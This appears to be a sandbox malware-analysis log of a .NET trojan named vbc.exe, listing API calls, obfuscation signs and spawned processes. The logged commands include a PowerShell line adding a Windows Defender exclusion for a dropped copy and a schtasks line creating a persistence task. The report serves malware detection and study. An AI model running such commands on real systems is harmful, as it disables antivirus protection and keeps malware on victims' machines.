          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295E96C
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0295CF94
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCDD66
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCD9C0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCEDB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCEE51
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC4F49
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FCF0C2
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC9CA8
          Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_04FC9C98
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00401030
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C130
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C9A5
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041BABE
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00408C7B
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0041C4E6
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00408C80
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402D87
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402D90
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00402FB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017F0D20
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_017FF900
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01814120
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018C1D55
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0180B090
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018B1002
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_0182EBB0
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01816E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B5C9A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B48C80
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B48C7B
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02B42D87
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_004187C2 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exeCode function: 8_2_01839A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0183AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839560 NtWriteFile,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0183B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0183A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0183A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839760 NtOpenProcess,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0183A770 NtOpenThread,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_018396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839A10 NtQuerySection,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_01839670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B58690 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B587C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B58710 NtClose,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B585E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B587C2 NtAllocateVirtualMemory,
          Source: vbc.exe | Binary or memory string: OriginalFilename vs vbc.exe
          Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs vbc.exe
          Source: vbc.exe, 00000000.00000002.267729856.0000000005CB0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs vbc.exe
          Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameHResult.dll6 vs vbc.exe
          Source: vbc.exe | Binary or memory string: OriginalFilename vs vbc.exe
          Source: vbc.exe, 00000008.00000002.344710455.0000000001A7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
          Source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameHelp.Exej% vs vbc.exe
          Source: vbc.exe | Binary or memory string: OriginalFilenameICollecti.exeB vs vbc.exe
          Source: vbc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: uZlkYhlkeLeaKC.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\vbc.exe | File read: C:\Users\user\Desktop\vbc.exe
          Source: vbc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
          Source: C:\Users\user\Desktop\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\vbc.exe | File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
          Source: C:\Users\user\Desktop\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/8@14/6
          Source: C:\Users\user\Desktop\vbc.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: vbc.exe | Joe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: vbc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: vbc.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe
          Source: Binary string: help.pdbGCTL source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp
          Source: Binary string: help.pdb source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | .Net Code: MjkfkeWbw19SlgRDaUO System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F7A49 push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F72F5 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F8699 push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F7151 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F87AD push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_006F879B push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 0_2_04FC95E5 push eax; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00406907 push 00000060h; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041A11B push ecx; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041A3BA pushfd ; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_004154EE pushad ; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00419E43 push 0000007Eh; iretd
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0040EFC6 push cs; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D17151 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D172F5 push cs; retf
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D17A49 push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D18699 push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D1879B push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_00D187AD push es; ret
          Source: C:\Users\user\Desktop\vbc.exe | Code function: 8_2_0184D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B5A3BA pushfd ; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B5B89C push eax; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B5B832 push eax; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B5B83B push eax; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B5A11B push ecx; ret
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B46907 push 00000060h; retf
          Source: C:\Windows\SysWOW64\help.exe | Code function: 20_2_02B59E43 push 0000007Eh; iretd
          Source: initial sample | Static PE information: section name: .text entropy: 7.9203967863
          Source: initial sample | Static PE information: section name: .text entropy: 7.9203967863
          Source: vbc.exe, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: vbc.exe, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: vbc.exe, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: vbc.exe, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: vbc.exe, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: vbc.exe, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: vbc.exe, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: vbc.exe, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: uZlkYhlkeLeaKC.exe.0.dr, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: uZlkYhlkeLeaKC.exe.0.dr, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: uZlkYhlkeLeaKC.exe.0.dr, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: uZlkYhlkeLeaKC.exe.0.dr, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: uZlkYhlkeLeaKC.exe.0.dr, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: uZlkYhlkeLeaKC.exe.0.dr, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: uZlkYhlkeLeaKC.exe.0.dr, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: uZlkYhlkeLeaKC.exe.0.dr, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 0.2.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 0.2.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs | High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
          Source: 0.2.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs | High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
          Source: 0.2.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs | High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
          Source: 0.2.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs | High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
          Source: 0.2.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs | High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
          Source: 0.2.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs | High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
          Source: 0.2.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
          Source: 0.0.vbc.exe.6f0000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs | High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
          Source: 0.0.vbc.exe.6f0000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs | High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
